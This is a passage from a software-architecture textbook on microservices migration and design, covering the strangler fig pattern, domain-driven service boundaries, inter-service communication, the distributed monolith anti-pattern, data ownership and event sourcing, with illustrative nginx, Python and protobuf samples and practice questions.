# Shadowing doubles the work and, for writes, doubles the side effects -- so
# shadow read paths and idempotent operations directly, and for side-effecting
# writes shadow against a staging store or compare derived state instead.
Key Takeaways
- Migrate incrementally and keep shipping; big-bang rewrites get cancelled with two systems running.
- Justify each extraction with a concrete driver — scaling, churn, compliance, team ownership — not with a feeling that something is separate.
- Extract low-coupling components first to learn the mechanics cheaply; the most business-critical component goes last.
- Modularize and split the data inside the monolith before moving anything over a network; the data split is what kills migrations.
- Shadow and compare, shift traffic by percentage, and actually delete the old path.
🧪 Practice
- Score three components of a system you know on coupling, churn, scaling difference, and team boundary, and justify which you would extract first.
- Pick a table joined by two candidate services and write out the options for removing that join, with the consistency cost of each.
- Interview: How do you validate that an extracted service behaves identically to the code it replaced? (Hint: think about running both and comparing, and what has to change when the operation has side effects.)
Strangler Fig Pattern
The strangler fig pattern is the standard technique for replacing a system incrementally. It is named after the tropical fig that germinates in a host tree's canopy, sends roots down around the trunk, and gradually takes over until the host rots away and the fig stands on its own. Applied to software: put a routing layer in front of the old system, build new functionality in the new one, redirect one route at a time, and eventually the old system serves nothing and can be deleted.
The reason this beats a rewrite is that it keeps risk proportional to progress. At every moment most of the system is the old, well-understood one, and the newly migrated slice is small enough to reason about and to reverse. There is never a day on which everything changes at once.
PHASE 1 facade in, nothing moved PHASE 2 some routes moved
clients clients
| |
[ facade / proxy ] [ facade / proxy ]
| / \
[ monolith ] /orders v v everything else
[ orders svc ] [ monolith ]
PHASE 3 most routes moved PHASE 4 host removed
clients clients
| |
[ facade / proxy ] [ facade / API gateway ]
/ | \ \ / | \
orders users cart [ monolith ] orders users cart
(one route left)
The facade is usually existing infrastructure rather than something new: an API gateway, an ingress controller, or an nginx config. What matters is that clients address the facade rather than the systems behind it, so moving a route is invisible to them.
# The strangler routing table, expressed as proxy configuration.
upstream monolith { server monolith.internal:8080; }
upstream orders_svc { server orders.internal:8080; }
upstream catalog_svc { server catalog.internal:8080; }
server {
listen 443 ssl;
server_name api.example.com;
# Migrated: these paths no longer reach the monolith at all.
location /api/orders/ { proxy_pass http://orders_svc; }
# Partial migration: a share of traffic goes to the new service while the
# old path stays available. split_clients hashes a STABLE key, so a given
# user gets a consistent backend instead of flapping between systems.
split_clients "${http_x_user_id}" $catalog_backend {
10% catalog_svc; # ramp: 10% -> 50% -> 100%
* monolith;
}
location /api/catalog/ { proxy_pass http://$catalog_backend; }
# Everything else: still the host tree.
location / { proxy_pass http://monolith; }
}
Three habits separate strangler migrations that finish from ones that stall. Route at the smallest useful granularity — a path, or even one endpoint, rather than "all of billing" — so each step is reversible. Keep the seam thin: once the facade holds business logic or elaborate payload transformation, you have built a third system to maintain. And define done per route as "the old code is deleted", not "the old code is unreachable"; unreached code still gets compiled, patched, and audited.
The pattern's hardest case is shared state. If the new service and the old monolith both need to read and write the same data during the transition, you must choose: keep a single writer and have the other call it, dual-write with a reconciliation job, or replicate one direction with change data capture and accept lag. Whichever you pick, pick it explicitly and time-box it — "both systems write the same table" is not a state to still be in a year later.
| Transition strategy | How it works | Main risk |
|---|---|---|
| Single writer | New service owns writes; the old calls it | Extra hop; old code must change |
| Dual write | Both write; a job reconciles differences | Divergence, partial failures |
| CDC replication | Stream one system's changes to the other | Replication lag; one-way only |
| Shared table | Both read and write directly | No boundary at all — avoid |
Key Takeaways
- Put a facade in front, move one route at a time, and delete the old path behind it; risk stays proportional to progress.
- Use existing routing infrastructure as the facade and keep it thin — logic in the seam creates a third system.
- Percentage routing on a stable hash key lets a route ramp safely and roll back instantly.
- Shared mutable state during the transition is the hard part: choose single writer, dual write plus reconciliation, or CDC deliberately, and time-box it.
- A route is done when the old implementation is deleted, not when it is unused.
🧪 Practice
- Write the proxy configuration that sends a single read endpoint to a new service for 5% of users, keyed on a stable identifier.
- For a feature both systems must write during migration, compare a single-writer plan with a dual-write plan and state the failure each allows.
- Interview: How do you tell whether a strangler migration is actually progressing? (Hint: think about which metric separates real progress from routes added to the new system while the old code still ships.)
<a id="102-service-oriented-architectures"></a>
10.2 Service-Oriented Architectures
Once a system is split across processes, the questions that matter are where the lines go and what crosses them. This subchapter covers the principles behind microservices, the domain-driven techniques for finding boundaries that hold, the communication choices between services, and the anti-pattern that results when the lines are drawn in the wrong place.
Microservices Principles
Microservices is an architectural style in which an application is built as a suite of small, independently deployable services, each owning its data and communicating over the network. "Small" is the least important word in that sentence and the one everyone fixates on. The load-bearing word is independently deployable: if two services must be released together, you have paid the full cost of distribution and received none of the benefit.
The principles that actually define the style are these:
- Independent deployability. A service can be released without coordinating with any other team. This implies backward-compatible contracts and no shared release train.
- Business capability alignment. A service maps to something the business does ("pricing", "fulfilment"), not to a technical layer ("the DAO service") or an entity table ("the user-table service").
- Data ownership. Each service owns its storage exclusively; nobody else reads or writes it directly. This is the boundary that matters most.
- Decentralized governance. Teams choose their own internals within a small set of platform-wide rules (observability, auth, deployment).
- Design for failure. Every call can time out, so every caller has a timeout, a retry policy, a fallback, and a circuit breaker (chapter 9).
- Smart endpoints, dumb pipes. Logic lives in services; the transport does routing and delivery, not business rules.
The prerequisites are as important as the principles, because microservices move complexity from inside the code to between the services, and the platform has to absorb it. A team that cannot deploy on demand, cannot trace a request across hops, and has no automated testing will not be rescued by splitting the codebase; they will simply get the same defects with network partitions added.
WHAT MOVES WHERE
MONOLITH MICROSERVICES
+---------------------------+ +------+ +------+ +------+
| complexity is INSIDE: | | each service is simple |
| - module tangle | +------+ +------+ +------+
| - big build | |
| - shared release | complexity is BETWEEN:
+---------------------------+ - contracts and versioning
- partial failure, retries
needs: discipline - distributed tracing
- data consistency (sagas)
- N pipelines, N dashboards
needs: a platform team's worth of
automation, or it eats you
# The honest readiness checklist. Every "no" is work you will do anyway --
# the only question is whether you do it before or during the incident.
prerequisites:
deploy_on_demand: # can any team ship to prod without a release meeting?
required: true
automated_tests: # can you refactor a service without manual QA?
required: true
distributed_tracing: # can you answer "which hop was slow?" in one place?
required: true
centralized_logging: # correlated by request id across services
required: true
service_discovery: # services find each other without hardcoded IPs
required: true
contract_testing: # a provider change that breaks a consumer fails CI
required: true
on_call_per_service: # the team that ships it carries the pager
required: true
Sizing deserves one direct answer, because it is the most common question. A service should be as small as it can be while still owning a complete business capability and its data — the useful test is whether a typical feature request can be delivered by changing one service. If most changes touch three services, they are too small or split along the wrong seam. The team-size heuristic ("a service a small team can own") is a consequence of that rule, not a replacement for it.
Key Takeaways
- The defining property is independent deployability; services that must be released together deliver cost without benefit.
- Align services with business capabilities, not with technical layers or individual tables.
- Exclusive data ownership is the boundary that matters most; a shared database erases every other boundary you drew.
- Microservices move complexity from inside the code to between the services, so the platform (CI/CD, tracing, discovery, contract tests) is a prerequisite, not a follow-up.
- Right size = a complete capability whose typical change request touches one service.
🧪 Practice
- Take the readiness checklist above and score a team you know; identify the single missing item that would hurt most on day one.
- Sketch a five-service decomposition of an e-commerce system and mark, for each service, the business capability and the data it exclusively owns.
- Interview: What is the first thing you would put in place before splitting a monolith? (Hint: think about what you lose the instant a call becomes a network hop, and what would let you debug it.)
Service Boundaries and Domain-Driven Design
The hardest question in service architecture is where to cut. Cut in the wrong place and every feature requires changes in three services and a coordinated release; cut well and most changes are local. Domain-driven design (DDD) is the body of technique for finding those lines, and its central claim is that good boundaries follow the business's own structure rather than the data model.
The most useful heuristic is cohesion of change: things that change together belong together. Its inverse is equally useful — if two components have never been modified in the same pull request, they are probably separable. Because most teams have years of version history, this is measurable rather than a matter of taste.
# Mining git history for boundaries: which files keep changing together?
from itertools import combinations
from collections import Counter
# In practice: `git log --name-only --pretty=format:---` parsed into commits.
COMMITS = [
{"order.py", "order_repo.py", "order_api.py"},
{"order.py", "pricing.py"},
{"order.py", "order_repo.py"},
{"catalog.py", "catalog_index.py"},
{"catalog.py", "catalog_index.py", "search.py"},
{"pricing.py", "promo.py"},
{"order.py", "order_api.py"},
]
pairs = Counter()
for files in COMMITS:
for a, b in combinations(sorted(files), 2):
pairs[(a, b)] += 1
for (a, b), n in pairs.most_common(5):
print(f"{n}x {a} <-> {b}")
# 3x order.py <-> order_repo.py ) these move as one unit:
# 2x order.py <-> order_api.py ) one service
# 2x catalog.py <-> catalog_index.py ) another unit
# 1x order.py <-> pricing.py ) weak link: a good boundary candidate
#
# High co-change ACROSS a proposed boundary predicts coordinated releases.
# Run this before drawing the diagram, not after the migration hurts.
DDD adds vocabulary for the structural decisions. A domain is the business area; subdomains partition it into core (your competitive advantage), supporting (necessary but not differentiating), and generic (solved elsewhere — buy it). That classification is directly actionable: invest engineering in the core, keep supporting subdomains simple, and never build a generic one yourself.
| Subdomain type | Example (a retailer) | Strategy |
|---|---|---|
| Core | Pricing and promotions engine | Build; best engineers; invest |
| Supporting | Order fulfilment workflow | Build simply; keep boring |
| Generic | Authentication, email, invoicing | Buy or use a managed service |
The other DDD tool worth knowing at the boundary level is the aggregate: a cluster of objects with one root, treated as a single consistency unit. The rule is that an aggregate is updated in one transaction and references other aggregates only by identity. That rule matters enormously for services, because an aggregate is the smallest thing that can be transactionally consistent — so a boundary that cuts through an aggregate creates a distributed transaction, and a boundary that follows aggregate edges does not.
GOOD BOUNDARY: follows the aggregate edge
Orders service Inventory service
+--------------------+ +---------------------+
| Order (root) | | StockItem (root) |
| OrderLine | --sku--> | reserved, on_hand |
| ShippingAddress | by ID +---------------------+
+--------------------+
one transaction per order one transaction per item
cross-aggregate work becomes an event or a saga -- deliberately
BAD BOUNDARY: cuts through one consistency unit
Order service Order-line service every order write is now
+-----------+ +-----------------+ a two-phase problem across
| Order |<------>| OrderLine | two databases, for no benefit
+-----------+ +-----------------+
Three sanity checks catch most bad boundaries before they are built. Would a typical feature request touch one service or several? Does any operation need a transaction spanning two of them? And does the boundary match a team boundary — because Conway's law says the architecture will drift toward the communication structure of the organization whether you plan for it or not.
Key Takeaways
- Boundaries follow the business structure, not the data model; things that change together belong together.
- Co-change analysis over git history turns boundary-drawing into evidence rather than opinion.
- Classify subdomains as core, supporting, or generic, and spend engineering effort accordingly.
- An aggregate is the unit of transactional consistency; boundaries that cut through one manufacture distributed transactions.
- Check every proposed boundary against feature locality, transaction scope, and team structure (Conway's law).
🧪 Practice
- Run a co-change analysis on a repository you have access to and propose two boundaries the data supports.
- Classify five subdomains of a system you know as core, supporting, or generic, and say what you would stop building.
- Interview: A proposed split puts "orders" and "order lines" in different services. What is your objection? (Hint: ask what a single transaction must cover, and what happens when one of the two writes fails.)
Bounded Contexts
A bounded context is the boundary within which a model and its language are consistent. Outside it, the same word may mean something different, and that is allowed. It is the single most useful idea in DDD for service design, because it resolves the argument that otherwise consumes every data-modelling meeting: the attempt to build one canonical definition of "customer" or "product" for the entire company.
That attempt always fails, and the reason is worth internalizing. To sales, a customer is a lead with a pipeline stage and an account owner. To billing, a customer is a legal entity with a tax ID and a payment method. To support, a customer is a person with a ticket history and a timezone. A unified model must satisfy all three, so it accumulates every field, every optional flag, and a change requested by any one team risks breaking the other two. The bounded context alternative is to let each context define "customer" its own way and to translate at the boundary.
ONE CANONICAL MODEL BOUNDED CONTEXTS
+-------------------+ SALES ctx BILLING ctx
| Customer | +----------+ +-------------+
| id, name, email, | | Lead | | Payer |
| tax_id, pipeline, | | stage | | tax_id |
| ticket_count, | | owner | | payment_mtd |
| payment_method, | | score | | currency |
| timezone, tier, | +----+-----+ +------+------+
| 40 more fields... | | |
+-------------------+ +-- customer_id ---+
every team blocked (shared identity only)
on every change SUPPORT ctx
+-------------+
| Contact |
| timezone |
| tickets |
+-------------+
Same person. Three models. One shared ID. No coordination cost.
What crosses a context boundary is an explicit contract, and the translation lives in an anti-corruption layer (ACL) — a piece of code whose only job is to map the other context's language into yours, so a foreign model never leaks into your domain.
# Anti-corruption layer: the ONLY place that knows the billing context's shape.
class BillingClient:
"""Support context's view of billing. Translates, never leaks."""
def __init__(self, http): self.http = http
def account_standing(self, customer_id: str) -> dict:
raw = self.http.get(f"/billing/payers/{customer_id}") # foreign model
# Map billing's vocabulary into the support context's vocabulary.
return {
"is_delinquent": raw["dunning_state"] in ("late", "collections"),
"plan_name": raw["subscription"]["tier_label"],
# Deliberately NOT returned: tax_id, payment_method, currency.
# Support has no use for them, and passing them through would make
# every billing field change a support-context change.
}
# In the support domain, nothing knows the word "dunning_state" exists.
def can_open_priority_ticket(customer, billing: BillingClient):
standing = billing.account_standing(customer.id)
return not standing["is_delinquent"]
Contexts relate to each other in a few recognizable ways, and naming the relationship tells you who absorbs change.
| Relationship | Meaning | Who absorbs change |
|---|---|---|
| Shared kernel | Two contexts share a small model, changed jointly | Both (costly) |
| Customer / supplier | Downstream's needs influence upstream's roadmap | Upstream, partly |
| Conformist | Downstream simply adopts upstream's model | Downstream fully |
| Anti-corruption layer | Downstream translates at the boundary | The ACL only |
| Open host service | Upstream publishes a stable, general-purpose API | Upstream |
| Published language | A shared, versioned interchange schema (events, DTOs) | Schema governance |
In practice, a bounded context is the natural unit for a service, and a context map — a diagram of contexts plus the relationship on each edge — is the most valuable architecture artefact a service-based system can have. It records not just who calls whom, but who is obliged to adapt when a model changes.
Key Takeaways
- A bounded context is the scope in which a model and its terms are consistent; the same word may legitimately mean different things in different contexts.
- One canonical enterprise model fails because it must satisfy every consumer, which couples every team to every change.
- Translate at boundaries with an anti-corruption layer so foreign models never leak into your domain.
- Name the relationship on each boundary — conformist, ACL, open host — because it determines who absorbs change.
- A bounded context is the natural unit for a service, and a context map is the artefact that keeps the boundaries honest.
🧪 Practice
- Take one entity in a system you know and write three different definitions of it, one per team; list which fields each actually needs.
- Implement an anti-corruption layer for an external API you consume, keeping its field names out of your domain entirely.
- Interview: Two teams argue about the definition of "order status". How do you resolve it? (Hint: consider that both may be right inside their own boundary, and what has to exist for that to work.)
Inter-Service Communication
Once services are separate, every interaction becomes a design decision with consequences for coupling, latency, and failure behaviour. The first and largest choice is synchronous request/response versus asynchronous messaging, and it is better framed as a question about temporal coupling: must both services be healthy at the same moment for the interaction to succeed?
Synchronous calls are simple to reason about — you get an answer, or an error, right now — but they chain availability. If service A calls B calls C synchronously, A's availability is bounded by the product of all three, and a slowdown anywhere shows up as latency everywhere upstream. Asynchronous messaging decouples in time: the sender publishes and moves on, the receiver processes when it can, and a down receiver produces a backlog rather than an outage. The price is that answers are not immediate and the system becomes eventually consistent.
SYNCHRONOUS CHAIN ASYNCHRONOUS FLOW
client client
| 200ms | 20ms (accepted)
v v
[ order ] --80ms--> [ pricing ] [ order ] --> ( broker ) --> [ pricing ]
| |
+---60ms--> [ inventory ] +-----> [ inventory ]
availability = 0.99 * 0.99 * 0.99 order stays up if pricing is down;
= 0.970 work queues and drains later
latency = sum of the chain latency = time to enqueue
failure = user sees an error failure = backlog, then catch-up
# The same business step, two shapes -- and two very different failure stories.
# --- synchronous: the caller owns the outcome and the waiting ---------------
def place_order_sync(cmd, pricing, inventory, orders_db):
price = pricing.quote(cmd["items"]) # network hop; may time out
if not inventory.reserve(cmd["items"]): # network hop; may time out
raise OutOfStock()
return orders_db.insert(cmd, price)
# If inventory.reserve() succeeds but the insert fails, stock is reserved
# for an order that does not exist -- a compensating action is now required.
# --- asynchronous: the caller records intent and publishes ------------------
def place_order_async(cmd, orders_db, outbox):
order_id = orders_db.insert_pending(cmd) # local transaction ...
outbox.append({ # ... same transaction
"type": "OrderPlaced", "order_id": order_id, "items": cmd["items"],
})
return {"order_id": order_id, "status": "pending"} # answer immediately
# A relay publishes the outbox rows after commit (transactional outbox,
# see 7.3): the DB write and the message can no longer disagree.
Within synchronous communication, the protocol choice is secondary but real.
| Style | Best for | Watch out for |
|---|---|---|
| REST/HTTP | Public APIs, wide client support | Chatty round trips, weak schema by default |
| gRPC | Internal service-to-service, low latency | Browser support, schema/deploy coupling |
| GraphQL | Aggregating many sources for varied UIs | N+1 resolvers, caching, query cost control |
| Messaging | Decoupling, buffering, fan-out | Eventual consistency, ordering, duplicates |
Three rules apply regardless of the choice. Every synchronous call needs a timeout shorter than the caller's own deadline, or a slow dependency turns into a thread pool exhaustion (see 9.2). Contracts must be versioned and backward-compatible, because you cannot deploy both sides at once — additive changes only, and never repurpose a field. And avoid deep synchronous chains: each hop multiplies failure probability and adds tail latency, so two hops is normal, five is a design smell, and a chain that loops back is a distributed deadlock waiting for load.
// Contract evolution rules made concrete in a schema.
syntax = "proto3";
message OrderRequest {
string order_id = 1;
string sku = 2;
int32 quantity = 3;
// Adding an OPTIONAL field with a NEW tag number is backward compatible:
// old servers ignore it, old clients never send it.
string coupon_code = 4;
// Never do either of these to a deployed contract:
// - reuse tag 2 for a different meaning (silent data corruption)
// - make a new field required (old clients break instantly)
reserved 5, 6; // tags retired by a past change: never recycled
reserved "legacy_discount"; // and neither is the old name
}
Key Takeaways
- The first choice is temporal coupling: synchronous means both parties must be healthy now; asynchronous trades immediacy for availability.
- Synchronous chains multiply failure probability and add tail latency; keep them shallow and always set timeouts shorter than the caller's deadline.
- Asynchronous messaging turns a dependency outage into a backlog, at the cost of eventual consistency.
- Pair a local write with a message publish using a transactional outbox so the database and the broker cannot disagree.
- Contracts must evolve additively — new optional fields, retired tags reserved forever — because both sides never deploy at once.
🧪 Practice
- Take a three-hop synchronous chain and compute its end-to-end availability and p99 latency from per-hop numbers; then redo it with one hop made async.
- Convert one synchronous side-effect call into an outbox-published event and describe what the caller now returns to the user.
- Interview: When would you deliberately choose a synchronous call over an event? (Hint: think about who needs the answer before responding to the user, and about operations that must be rejected rather than queued.)
Distributed Monolith Anti-Pattern
A distributed monolith is a system split into services that still must be deployed, tested, and reasoned about as a unit. It is the worst of both worlds: the operational cost of a distributed system with the coupling of a monolith, and it is by far the most common failure mode of a microservices migration.
The reason it happens is that decomposition was done along the wrong lines — usually technical layers or database tables rather than business capabilities — so every real feature cuts across many services. The symptoms are recognizable long before anyone names the pattern.
SYMPTOM CHECKLIST -- any two of these means you have one
[ ] Releases are coordinated: "deploy A, then B, then C, in that order"
[ ] One feature routinely requires changes to 3+ services
[ ] Services share a database or read each other's tables
[ ] Local development requires running the entire system
[ ] A single service's rollback forces other rollbacks
[ ] Integration tests are the only tests anyone trusts
[ ] Services are versioned together (all at v4.2.1)
[ ] One service being down means the whole system is down
WRONG CUT (technical layers) RIGHT CUT (capabilities)
[ web service ] [ orders svc ] own web+logic+data
| [ catalog svc ] own web+logic+data
[ business-logic service ] [ billing svc ] own web+logic+data
|
[ data-access service ] One feature -> one service.
|
[ shared database ]
One feature -> all three services, in a fixed deploy order.
Three network hops added; zero independence gained.
The most damaging variant is the shared database. If two services read the same tables, the schema is a public API with no version, no owner, and no contract test. A column rename becomes a cross-team outage, and nothing about "service boundaries" in the code changes that, because the coupling is in the storage layer where no compiler will find it.
# A CI check that detects coordinated releases -- the clearest symptom.
DEPLOY_LOG = [ # (timestamp_minutes, service, version)
(0, "orders", "v41"), (2, "pricing", "v41"), (3, "inventory", "v41"),
(240, "orders", "v42"), (241,"pricing", "v42"), (243,"inventory", "v42"),
(700, "catalog", "v13"),
]
def lockstep_groups(log, window=15):
groups, current = [], []
for ts, svc, ver in sorted(log):
if current and ts - current[-1][0] <= window:
current.append((ts, svc, ver))
else:
if len(current) > 1: groups.append(current)
current = [(ts, svc, ver)]
if len(current) > 1: groups.append(current)
return groups
for g in lockstep_groups(DEPLOY_LOG):
print([s for _, s, _ in g])
# ['orders', 'pricing', 'inventory']
# ['orders', 'pricing', 'inventory']
#
# The same set shipping together twice is not a coincidence -- it is one
# component wearing three service names. Independent deployability is the
# claim; the deploy log is the evidence.
Getting out is unglamorous and specific. Merge services that always ship together back into one — a smaller number of correct boundaries beats a large number of wrong ones, and re-merging is a legitimate architectural move rather than an admission of defeat. Break the shared database by assigning each table exactly one owner and replacing foreign reads with an API call or a replicated read model. Replace synchronous chains that exist purely to fetch data with events that push the data ahead of time. And make the invariant explicit: any service that cannot be deployed alone is not a service yet.
Key Takeaways
- A distributed monolith has service-level operational cost with monolith-level coupling; it is the default outcome of splitting along the wrong lines.
- The diagnostic is the deploy log: services that always ship together are one component with several names.
- A shared database is the strongest form of the anti-pattern — the schema becomes an unversioned public API.
- The fix includes merging services back together; fewer correct boundaries beat many wrong ones.
- Make "deployable alone" a hard invariant, and test it.
🧪 Practice
- Take a deploy history and identify every set of services that ships in lockstep; propose a merge for the strongest group.
- Pick one table read by two services, assign an owner, and design the replacement access path for the non-owner.
- Interview: How would you tell, from the outside, whether a company's "microservices" are really a distributed monolith? (Hint: ask what happens when one team wants to ship on a Friday afternoon.)
Data Ownership per Service
Exclusive data ownership is the boundary that makes all the others real. The rule is simple: each piece of data has exactly one service that may write it and one schema that only that service may touch. Everyone else goes through its API or consumes its events. Without this rule, code-level boundaries are decoration.
The reason it is non-negotiable is that a database schema shared by several
services is a contract with none of the properties of a contract. It has no
version, no deprecation path, no consumer tests, and no owner who can approve a
change. Worse, it lets any service violate another's invariants: a service that
writes directly to orders can create an order in a state the orders service's
own code would reject.
SHARED DATABASE DATABASE PER SERVICE
[orders] [billing] [reporting] [orders] [billing] [reporting]
\ | / | | |
\ | / [orders_db] [billing_db] [warehouse]
+-------------------+ | | ^
| one schema | +---- events -+------------+
+-------------------+
reads of foreign data go through
any service can break an API call or a replicated
any other's invariants read model -- never a JOIN
The obvious objection is that queries spanning services become hard, and that is true — it is the actual cost of the pattern. There are four standard answers, and choosing the right one per case is the real work.
| Need | Technique | Cost |
|---|---|---|
| A few fields, fresh | Synchronous API call | Latency, availability coupling |
| Many reads, tolerant of lag | Replicate a read model locally | Storage, staleness, sync code |
| Cross-service reporting | Stream to a warehouse/lake | Pipeline, minutes-to-hours lag |
| Composing several sources per UI | Aggregator / BFF service | Another service; fan-out latency |
Replicating a read model is the most useful and least understood of these. The consuming service subscribes to the owner's events and keeps a local copy of just the fields it needs — denormalized, read-optimized, and explicitly stale. It turns a synchronous dependency into an asynchronous one, which is usually the whole point.
# Orders keeps a LOCAL copy of the few customer fields it needs, fed by events
# from the customers service. It never calls customers on the request path.
def handle_customer_event(event, local_db):
if event["type"] in ("CustomerCreated", "CustomerUpdated"):
local_db.upsert("customer_read_model", {
"customer_id": event["customer_id"],
"display_name": event["name"], # only what orders actually uses
"country": event["country"], # for tax rules
"tier": event["tier"], # for discounts
"updated_at": event["occurred_at"],
})
# Deliberately NOT copied: email, phone, address history. Copy the
# fields you use; every extra field is a change you must now absorb.
def place_order(cmd, local_db):
# No network hop, no availability coupling: the customers service can be
# down for an hour and orders keeps working with data that is minutes old.
customer = local_db.get("customer_read_model", cmd["customer_id"])
discount = 0.10 if customer["tier"] == "gold" else 0.0
...
Two disciplines keep this from becoming a mess. Be explicit about which service is the source of truth for each field — copies are copies, and a copy must never be edited locally. And decide, per use, whether stale data is acceptable: a stale display name is fine, a stale account balance used to authorize a withdrawal is not. Where staleness is unacceptable, either call the owner synchronously or move the decision into the owning service, which is often the better answer — put the logic where the data lives rather than shipping the data to the logic.
Key Takeaways
- Each piece of data has exactly one owning service that writes it; everyone else uses an API or events.
- A shared schema is a contract with no version, no owner, and no consumer tests, and it lets other services violate the owner's invariants.
- Cross-service queries are the real cost; answer them with API calls, replicated read models, a warehouse, or an aggregator — chosen per case.
- Replicated read models copy only the fields you use, are never edited locally, and convert a synchronous dependency into an asynchronous one.
- Decide explicitly whether staleness is acceptable; if it is not, move the decision to the service that owns the data.
🧪 Practice
- For a report that joins three services' data today, design the pipeline that produces it without any service reading another's tables.
- Define a read model for one consumer: list exactly the fields it needs, the events that maintain it, and the maximum staleness it tolerates.
- Interview: A service needs another service's data on every request. What do you propose? (Hint: consider whether the data or the decision should move, and what the freshness requirement really is.)
<a id="103-event-driven-architectures"></a>
10.3 Event-Driven Architectures
Event-driven architecture inverts the direction of dependency: instead of a service calling the services it needs, it announces what happened and interested parties react. This subchapter covers what an event should carry, the patterns built on treating events as the primary record, the two ways to coordinate a multi-service workflow, and how to live with the eventual consistency that follows.
Event Notification vs. Event-Carried State Transfer
An event is a statement that something happened, in the past tense, published by the service that owns the fact. The decision nobody makes deliberately enough is how much data the event carries, and it has large consequences for coupling, payload size, and how much the consumer needs to know.
Event notification publishes a minimal fact — an identifier and a type — and consumers call back for details if they need them. Event-carried state transfer (ECST) publishes the relevant state inside the event, so a consumer can act without calling anyone. Notification keeps payloads tiny and the schema stable, but recreates the synchronous dependency it was meant to remove. ECST removes that dependency entirely, at the cost of bigger events, a richer schema to maintain, and data duplicated across consumers.
EVENT NOTIFICATION EVENT-CARRIED STATE TRANSFER
[orders] --"OrderPlaced{id}"--> [orders] --"OrderPlaced{id, customer,
(broker) items, total, address}"-->
| (broker)
v |
[shipping] v
| GET /orders/{id} [shipping]
v acts immediately;
[orders] <-- still a runtime dependency orders may be DOWN
on the publisher
small payloads, stable schema no callback, no coupling at read time
publisher must be up to consume larger payloads, versioned schema,
N consumers = N callbacks duplicated state in each consumer
// Notification: "something happened, go look".
{
"type": "OrderPlaced",
"order_id": "ord_8891",
"occurred_at": "2026-08-26T10:15:04Z",
"version": 1
}
// Event-carried state transfer: "something happened, and here is what you need".
{
"type": "OrderPlaced",
"order_id": "ord_8891",
"occurred_at": "2026-08-26T10:15:04Z",
"version": 3,
"customer": { "id": "cus_12", "tier": "gold", "country": "IT" },
"items": [ { "sku": "SKU-1", "qty": 2, "unit_price": 19.99 } ],
"total": 35.98,
"ship_to": { "city": "Milano", "postcode": "20121", "country": "IT" }
}
# The same consumer, written both ways. Note what each one depends on.
def on_order_placed_notification(event, orders_api, shipments):
# Callback on the publisher: correct, but shipping is now DOWN whenever
# orders is down, and N consumers produce N calls per event.
order = orders_api.get(event["order_id"]) # synchronous dependency
shipments.create(order["ship_to"], order["items"])
def on_order_placed_ecst(event, shipments):
# Self-contained: no call, no coupling, and it can be replayed later from
# the log and still produce the same result -- the event IS the input.
shipments.create(event["ship_to"], event["items"])
A useful middle path is to carry the state a consumer needs to decide, plus an ID for anything it might need to display. A third variant, the thin event with a versioned snapshot link, publishes an ID plus a pointer to an immutable snapshot — useful when payloads are large (documents, images) but consumers still need a stable view.
| Property | Notification | Event-carried state |
|---|---|---|
| Payload size | Tiny | Proportional to the state |
| Runtime coupling | Consumer calls back | None |
| Schema surface | Minimal, stable | Large, needs versioning |
| Consumer replay | Sees today's data | Sees data as it was then |
| Publisher load | Grows with consumers | Constant |
| Data duplication | None | In every consumer |
The replay row is subtle and often decides the matter. If a consumer re-processes last month's events after a bug fix, a notification-based consumer calls the API and gets current state — reconstructing history with today's values, which is usually wrong. An ECST consumer replays exactly what was true when the event was emitted.
Key Takeaways
- Events are past-tense facts published by the owner of that fact.
- Notification carries an ID and forces a callback, which reintroduces runtime coupling to the publisher.
- Event-carried state transfer makes consumers self-sufficient and replayable, at the cost of larger payloads, schema versioning, and duplicated data.
- Carry the state needed to decide; carry IDs for what is merely displayed.
- Replay behaviour often settles the choice: notifications reconstruct history using today's data, which is usually incorrect.
🧪 Practice
- Design both event shapes for "user changed email" and list which consumers each shape would force to call back.
- Take an ECST event and mark each field as decision-relevant or display-only; propose a trimmed payload.
- Interview: A consumer must re-process a month of events after fixing a bug. Which event style makes that safe? (Hint: think about what "the customer's tier" meant then versus what an API returns now.)
Event Sourcing
Event sourcing stores state as an append-only sequence of events rather than as a
mutable current row. Instead of UPDATE accounts SET balance = 120, you append
Deposited{amount: 20} and compute the balance by folding the events. Current
state becomes a derived value; the log becomes the source of truth.
The motivation is that ordinary state storage destroys information. A row tells
you the balance is 120; it cannot tell you that it was 500 yesterday, that a
refund was reversed, or who authorized what. Any business that needs an audit
trail, temporal queries ("what did this look like on the 3rd?"), or the ability
to re-derive state after fixing a bug has already been rebuilding a partial event
log in audit_log tables. Event sourcing makes the log primary and derives
everything else from it.
STATE-ORIENTED EVENT-SOURCED
accounts events (append only)
+----+---------+ +---+----------+----------------+
| id | balance | | 1 | Opened | {} |
| 7 | 120 | <- overwritten | 2 | Deposited| {amount: 100} |
+----+---------+ every write | 3 | Withdrew | {amount: 30} |
| 4 | Deposited| {amount: 50} |
history: gone +---+----------+----------------+
balance = fold(events) = 120
balance on the 3rd = fold(events<=3)
why 120? read events 1..4
from functools import reduce
# ---- events are immutable facts; the aggregate replays them ----------------
def apply(state, event):
kind, data = event["type"], event["data"]
if kind == "Opened": return {"balance": 0, "status": "open"}
if kind == "Deposited": return {**state, "balance": state["balance"] + data["amount"]}
if kind == "Withdrew": return {**state, "balance": state["balance"] - data["amount"]}
if kind == "Frozen": return {**state, "status": "frozen"}
return state
def replay(events, upto=None):
chosen = events if upto is None else [e for e in events if e["seq"] <= upto]
return reduce(apply, chosen, {})
EVENTS = [
{"seq": 1, "type": "Opened", "data": {}},
{"seq": 2, "type": "Deposited", "data": {"amount": 100}},
{"seq": 3, "type": "Withdrew", "data": {"amount": 30}},
{"seq": 4, "type": "Deposited", "data": {"amount": 50}},
]
print(replay(EVENTS)) # {'balance': 120, 'status': 'open'}
print(replay(EVENTS, upto=3)) # {'balance': 70, 'status': 'open'}
# ^ time travel, for free
# ---- writing: validate against replayed state, then APPEND -----------------
def withdraw(store, account_id, amount, expected_version):
state = replay(store.load(account_id))
if state["status"] == "frozen": raise Rejected("account frozen")
if state["balance"] < amount: raise Rejected("insufficient funds")
store.append(account_id,
{"type": "Withdrew", "data": {"amount": amount}},
expected_version) # optimistic concurrency: the append
# fails if another writer moved the
# stream forward since we replayed
Replaying an entire stream on every read is impractical for long-lived aggregates, so two mechanisms make it workable. Snapshots persist the folded state every N events, so replay starts from the snapshot rather than the beginning. And read models (next topic) maintain query-shaped projections continuously, so ordinary reads never touch the event log at all.
def load_fast(store, account_id, snapshot_every=100):
snap = store.latest_snapshot(account_id) # {'seq': 400, 'state': ...}
start = snap["seq"] if snap else 0
state = snap["state"] if snap else {}
tail = store.load_since(account_id, start) # only the recent events
state = reduce(apply, tail, state)
